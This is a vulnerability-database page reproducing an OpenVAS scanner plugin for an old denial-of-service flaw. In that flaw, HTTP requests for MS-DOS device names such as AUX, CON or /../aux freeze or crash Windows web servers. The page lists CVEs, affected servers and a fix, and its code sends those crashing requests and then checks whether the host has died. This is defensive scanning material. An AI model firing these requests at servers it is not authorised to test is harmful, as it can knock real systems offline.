Lucene search

K
openvasCopyright (C) 2001 Michel ArboiOPENVAS:136141256231010930
HistoryNov 03, 2005 - 12:00 a.m.

HTTP Windows 98 MS/DOS device names DOS

2005-11-0300:00:00
Copyright (C) 2001 Michel Arboi
plugins.openvas.org
99

6.3 Medium

AI Score

Confidence

Low

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.059 Low

EPSS

Percentile

93.3%

It was possible to freeze or reboot Windows by
reading a MS/DOS device through HTTP, using a file name like CON\CON, AUX.htm or AUX.

# SPDX-FileCopyrightText: 2001 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.10930");
  script_version("2023-08-03T05:05:16+0000");
  script_tag(name:"last_modification", value:"2023-08-03 05:05:16 +0000 (Thu, 03 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/1043");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2575");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2608");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2622");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2649");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2704");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/3929");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/6659");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/6662");
  script_xref(name:"IAVA", value:"2003-t-0003");
  script_cve_id("CVE-2001-0386", "CVE-2001-0493", "CVE-2001-0391", "CVE-2001-0558", "CVE-2002-0200",
                "CVE-2000-0168", "CVE-2003-0016", "CVE-2001-0602", "CVE-2003-0421", "CVE-2003-0502");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("HTTP Windows 98 MS/DOS device names DOS");
  script_category(ACT_KILL_HOST);
  script_copyright("Copyright (C) 2001 Michel Arboi");
  script_family("Denial of Service");
  script_dependencies("find_service.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("Host/runs_windows");

  script_tag(name:"solution", value:"Upgrade the system or use a
  HTTP server that filters those names out.");

  script_tag(name:"summary", value:"It was possible to freeze or reboot Windows by
  reading a MS/DOS device through HTTP, using a file name like CON\CON, AUX.htm or AUX.");

  script_tag(name:"impact", value:"An attacker may use this flaw to make your
  system crash continuously, preventing you from working properly.");

  script_tag(name:"affected", value:"Known vulnerable servers:

  vWebServer v1.2.0 (and others?)

  AnalogX SimpleServer:WWW 1.08 (CVE-2001-0386)

  Small HTTP server 2.03 (CVE-2001-0493)

  acWEB HTTP server?

  Xitami Web Server (BID:2622, CVE-2001-0391)

  Jana Web Server (BID:2704, CVE-2001-0558)

  Cyberstop Web Server (BID:3929, CVE-2002-0200)

  General Windows MS-DOS Device (BID:1043, CVE-2000-0168)

  Apache < 2.0.44 (CVE-2003-0016)

  Domino 5.0.7 and earlier (CVE-2001-0602, BID: 2575)

  Darwin Streaming Server v4.1.3e (CVE-2003-0421)

  Darwin Streaming Server v4.1.3f (CVE-2003-0502)");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_probe");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

dev[0] = "aux";
dev[1] = "con";
dev[2] = "prn";
dev[3] = "clock$";
dev[4] = "com1";
dev[5] = "com2";
dev[6] = "lpt1";
dev[7] = "lpt2";

i = 0;
ext[i++] = ".htm"; # Should we add .html ?
ext[i++] = ".";
ext[i++] = ". . .. ... .. .";
ext[i++] = ".asp";
ext[i++] = ".foo";
ext[i++] = ".bat";
# Special meanings
ext[i++] = "-"; # /../ prefix
ext[i++] = "+"; # /aux/aux pattern

port = http_get_port(default:80);
if (http_is_dead(port: port))
  exit (0);

start_denial();

n = 0;
for (i = 0; dev[i]; i++) {
  d = dev[i];
  for (j = 0; ext[j]; j++) {
    e = ext[j];
    if (e == "+")
      name = string("/", d, "/", d);
    else if (e == "-")
      name = string("/../", d); # Kills Darwin Streaming Server v4.1.3f and earlier (Win32 only)
    else
      name = string("/", d, e);

    req = http_get(item:name, port:port);
    soc = http_open_socket(port);
    if(soc) {
      send(socket:soc, data:req);
      http_recv(socket:soc);
      http_close_socket(soc);
    }
  }
}

alive = end_denial();
if(!alive) {
  security_message(port:port);
  set_kb_item( name:"Host/dead", value:TRUE );
  exit(0);
}

if(http_is_dead(port:port)) {
  security_message(port:port);
  exit(0);
}

exit(99);

6.3 Medium

AI Score

Confidence

Low

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.059 Low

EPSS

Percentile

93.3%

Related for OPENVAS:136141256231010930